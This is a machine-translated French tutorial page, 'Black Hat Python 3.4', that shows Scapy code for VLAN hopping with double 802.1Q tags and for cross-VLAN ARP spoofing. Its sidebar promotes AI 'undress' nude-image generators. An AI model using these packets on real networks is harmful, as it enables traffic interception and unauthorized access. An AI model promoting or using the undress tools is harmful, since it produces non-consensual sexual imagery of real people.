Maison développement back-end Tutoriel Python Programmation Python Black Hat 3.4 sur VLAN

Programmation Python Black Hat 3.4 sur VLAN

Feb 24, 2017 pm 03:29 PM

VLAN (Virtual Local Area Network) est un réseau virtuel construit sur la base de la technologie d'interaction Ethernet. Il peut non seulement diviser le même réseau physique en plusieurs VALN, mais également franchir les barrières physiques du réseau et diviser les utilisateurs de différents sous-réseaux en un seul. VLAN. La figure 2 est un exemple de division VLAN.

Python黑帽编程 3.4 跨越VLAN

Figure 2

Il existe de nombreuses façons de mettre en œuvre le VLAN. Il existe généralement deux types de division VLAN basées sur l'équipement de commutation :

l Division des ports basée sur un commutateur

l Basé sur le protocole IEEE 802.1q, format de trame Ethernet étendu

VLAN basé sur la couche 2 Dans la technologie, il existe le concept de Trunking, qui est utilisé pour connecter différents commutateurs afin de garantir que les membres du même VLAN établi sur plusieurs commutateurs peuvent communiquer entre eux. Les ports utilisés pour l'interconnexion entre les commutateurs sont appelés ports Trunk. En plus du 80.2.1q, Cisco possède son propre protocole Trunk appelé ISL.

Python黑帽编程 3.4 跨越VLAN

Figure 3

La figure 3 est un paquet de données 802.1q, qui n'est pas essentiellement différent d'une trame Ethernet ordinaire. ajoutez une balise VLAN. L'identifiant de VLAN dans la partie rouge identifie à quel VLAN appartient un paquet de données, garantissant ainsi que la plage de diffusion de données ne s'étend pas sur les VLAN.

Réfléchissons-y brièvement maintenant. Si nous voulons communiquer entre VLAN, avons-nous simplement besoin de modifier l'identifiant dans le paquet de données ?

3.4.1 Saut de VLAN

Sur la base de l'analyse ci-dessus, nous considérons un scénario simple : cross-VLAN ping, envoie une demande ping d'un hôte dans Vlan1 à un hôte dans Vlan2.

Avant un codage spécifique, nous devons encore résoudre le problème de construction des paquets VLAN. Dans Scapy, nous utilisons la classe Dot1Q pour construire la partie Tag dans la figure 3. Comme le montre la figure 4.

Python黑帽编程 3.4 跨越VLAN

Figure 4

Nous pouvons maintenant écrire une requête ping inter-VLAN.

#!/usr/bin/python 
from scapy.all import * 
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
Dot1Q(vlan=1) / \
Dot1Q(vlan=2) / \
IP(dst="192.168.13.3") / \
ICMP() 
sendp(packet)
Copier après la connexion

Dans le code ci-dessus, nous spécifions l'adresse MAC et IP de l'hôte cible, et ajoutons deux identifiants VLAN. Le premier est. envoyé Le VLAN où se trouve l'hôte de données, et le second est le VLAN où se trouve l'hôte cible. Le commutateur supprimera le premier identifiant et lorsqu’il lira le deuxième identifiant, il transmettra le paquet à l’hôte cible.

3.4.2 Usurpation d'ARP inter-VLAN

Section 3.1, 3.2 et 3.3 Nous discutons tous de la question de l'usurpation d'identité ARP. Étant donné que le VLAN limite le domaine de diffusion, notre code précédent ne peut pas effectuer d'usurpation d'identité ARP sur les VLAN. Cependant, il est très simple de résoudre ce problème. Il suffit d'insérer l'identifiant du VLAN dans les données d'usurpation d'identité ARP que nous avons construites précédemment. Le code suivant est le code que nous avons utilisé pour construire le paquet de requête ARP dans la section 3.1.

def build_req():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt
Copier après la connexion

Dans la partie de construction du paquet de données, nous insérons l'identifiant du VLAN :

pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
Copier après la connexion

De cette façon, l'usurpation d'identité ARP inter-VLAN peut être réalisée.

3.4.3 Résumé

Cette section explique principalement comment construire des paquets de données pour usurper le VLAN afin d'obtenir des -À des fins de communication de données VLAN et d'usurpation d'identité ARP. Il convient de noter que la méthode présentée dans cet article concerne principalement le protocole 802.1Q et n'a aucun effet sur les VLAN physiquement isolés par les ports.

Ce qui précède est l'explication détaillée de la programmation Python Black Hat 3.4 sur les VLAN présentée par l'éditeur. J'espère que cela vous sera utile. Si vous avez des questions, veuillez me laisser un message et le. l'éditeur répondra à temps. Je voudrais également vous remercier tous pour votre soutien au site Web PHP chinois !

Pour plus d'articles sur la programmation Python Black Hat 3.4 cross-VLAN, veuillez faire attention au site Web PHP chinois !


Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Outils d'IA chauds

Undresser.AI Undress

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Undress AI Tool

Undress AI Tool

Images de déshabillage gratuites

Clothoff.io

Clothoff.io

Dissolvant de vêtements AI

AI Hentai Generator

AI Hentai Generator

Générez AI Hentai gratuitement.

Article chaud

R.E.P.O. Crystals d'énergie expliqués et ce qu'ils font (cristal jaune)
4 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Meilleurs paramètres graphiques
3 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Comment réparer l'audio si vous n'entendez personne
4 Il y a quelques semaines By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25: Comment déverrouiller tout dans Myrise
1 Il y a quelques mois By 尊渡假赌尊渡假赌尊渡假赌

Outils chauds

Bloc-notes++7.3.1

Bloc-notes++7.3.1

Éditeur de code facile à utiliser et gratuit

SublimeText3 version chinoise

SublimeText3 version chinoise

Version chinoise, très simple à utiliser

Envoyer Studio 13.0.1

Envoyer Studio 13.0.1

Puissant environnement de développement intégré PHP

Dreamweaver CS6

Dreamweaver CS6

Outils de développement Web visuel

SublimeText3 version Mac

SublimeText3 version Mac

Logiciel d'édition de code au niveau de Dieu (SublimeText3)

Comment résoudre le problème des autorisations rencontré lors de la visualisation de la version Python dans le terminal Linux? Comment résoudre le problème des autorisations rencontré lors de la visualisation de la version Python dans le terminal Linux? Apr 01, 2025 pm 05:09 PM

Solution aux problèmes d'autorisation Lors de la visualisation de la version Python dans Linux Terminal Lorsque vous essayez d'afficher la version Python dans Linux Terminal, entrez Python ...

Comment copier efficacement la colonne entière d'une dataframe dans une autre dataframe avec différentes structures dans Python? Comment copier efficacement la colonne entière d'une dataframe dans une autre dataframe avec différentes structures dans Python? Apr 01, 2025 pm 11:15 PM

Lorsque vous utilisez la bibliothèque Pandas de Python, comment copier des colonnes entières entre deux frames de données avec différentes structures est un problème courant. Supposons que nous ayons deux dats ...

Comment enseigner les bases de la programmation novice en informatique dans le projet et les méthodes axées sur les problèmes dans les 10 heures? Comment enseigner les bases de la programmation novice en informatique dans le projet et les méthodes axées sur les problèmes dans les 10 heures? Apr 02, 2025 am 07:18 AM

Comment enseigner les bases de la programmation novice en informatique dans les 10 heures? Si vous n'avez que 10 heures pour enseigner à l'informatique novice des connaissances en programmation, que choisissez-vous d'enseigner ...

Comment Uvicorn écoute-t-il en permanence les demandes HTTP sans servir_forever ()? Comment Uvicorn écoute-t-il en permanence les demandes HTTP sans servir_forever ()? Apr 01, 2025 pm 10:51 PM

Comment Uvicorn écoute-t-il en permanence les demandes HTTP? Uvicorn est un serveur Web léger basé sur ASGI. L'une de ses fonctions principales est d'écouter les demandes HTTP et de procéder ...

Comment éviter d'être détecté par le navigateur lors de l'utilisation de Fiddler partout pour la lecture de l'homme au milieu? Comment éviter d'être détecté par le navigateur lors de l'utilisation de Fiddler partout pour la lecture de l'homme au milieu? Apr 02, 2025 am 07:15 AM

Comment éviter d'être détecté lors de l'utilisation de FiddlereVerywhere pour les lectures d'homme dans le milieu lorsque vous utilisez FiddlereVerywhere ...

Comment créer dynamiquement un objet via une chaîne et appeler ses méthodes dans Python? Comment créer dynamiquement un objet via une chaîne et appeler ses méthodes dans Python? Apr 01, 2025 pm 11:18 PM

Dans Python, comment créer dynamiquement un objet via une chaîne et appeler ses méthodes? Il s'agit d'une exigence de programmation courante, surtout si elle doit être configurée ou exécutée ...

Quelles sont les bibliothèques Python populaires et leurs utilisations? Quelles sont les bibliothèques Python populaires et leurs utilisations? Mar 21, 2025 pm 06:46 PM

L'article traite des bibliothèques Python populaires comme Numpy, Pandas, Matplotlib, Scikit-Learn, Tensorflow, Django, Flask et Demandes, détaillant leurs utilisations dans le calcul scientifique, l'analyse des données, la visualisation, l'apprentissage automatique, le développement Web et H et H

Que sont les expressions régulières? Que sont les expressions régulières? Mar 20, 2025 pm 06:25 PM

Les expressions régulières sont des outils puissants pour la correspondance des motifs et la manipulation du texte dans la programmation, améliorant l'efficacité du traitement de texte sur diverses applications.

See all articles